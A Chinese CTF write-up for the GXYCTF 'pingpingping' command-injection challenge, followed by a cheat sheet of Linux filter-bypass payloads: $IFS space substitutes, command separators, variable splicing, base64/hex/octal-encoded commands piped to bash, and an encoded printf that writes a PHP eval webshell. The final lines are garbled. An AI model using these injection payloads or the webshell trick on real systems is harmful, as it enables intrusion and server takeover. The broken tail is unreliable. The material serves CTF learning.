2020.02.28
GXYCTF pingpiingping
这道题目命令执行
利用方法是 通过管道符 看到有两个文件flag.php index.php
发现他过滤了空格
所以利用127.0.0.1|cat$IFS$1index.php
查看源码
分析可得 模糊了flag 不可以直接查看flagphp
然后利用组合的方式
127.0.0.1|a=fl;b=ag;cat$IFS$1$a$b.php
得到答案
另外我们可以尝试使用反引号内联执行的做法,linux下反引号``里面包含的就是需要执行的系统命令
而反引号里面的系统命令会先执行,成功执行后将结果传递给调用它的命令
?ip=127.0.0.1;cat$IFSls
查看源代码可以看到index.php和flag.php的内容都显示了出来
Linux常用绕过方法
-
空格过滤
< 、<>、%20(space)、%09(tab)、$IFS$9、 I F S 、 {IFS}、 IFS、IFS等
$IFS
${IFS} < $IFS$1
$IFS$1 // 1 改 成 1改成 1改成加其他数字貌似都行
<
<>
{cat,flag.php} //用逗号实现了空格功能
%20
%09
-
一些命令分隔符
linux中:%0a 、%0d 、; 、& 、| 、&&、||
windows中:%0a、&、|、%1a(一个神奇的角色,作为.bat文件中的命令分隔符)
-
花括号的别样用法
在Linux bash中还可以使用{OS_COMMAND,ARGUMENT}来执行系统命令
{cat,flag} -
黑名单绕过
拼接绕过:a=l;b=s;aaab
编码绕过base64:
echo “Y2F0IC9mbGFn”|base64-d|bashcat /flag
hex:
echo “636174202f666c6167” | xxd -r -p|bash
cat /flag
oct:
$(printf “\154\163”)
ls$(printf “\x63\x61\x74\x20\x2f\x66\x6c\x61\x67”)
cat /flag
{printf,"\x63\x61\x74\x20\x2f\x66\x6c\x61\x67"}|$0
cat /flag
#可以通过这样来写webshell,内容为<?php @eval($_POST['c']);?>
${printf,"\74\77\160\150\160\40\100\145\166\141\154\50\44\137\120\117\123\124\133\47\143\47\135\51\73\77\76"}
1.php
单引号和双引号绕过
比如:ca’'t flag 或ca"“t flag
反斜杠绕过
比如:ca\t fl\ag
5、利用Shell 特殊变量绕过
例如,第一个参数是1,第二个参数是2。而参数不存在时其值为空。
@表示(@表示(@表示(@:同样也是获取当前shell的参数,不加引号和∗是一样的,那么加了引号如:”*是一样的,那么加了引号如:“∗是一样的,那么加了引号如:”@" 表示将所有的参数视为不同独立的字符串,相当于" 1 " " 2 " . . ) < b r > 比 如 : c a 2 " . . ) < b r > 比 如 : c a 2 " . . ) <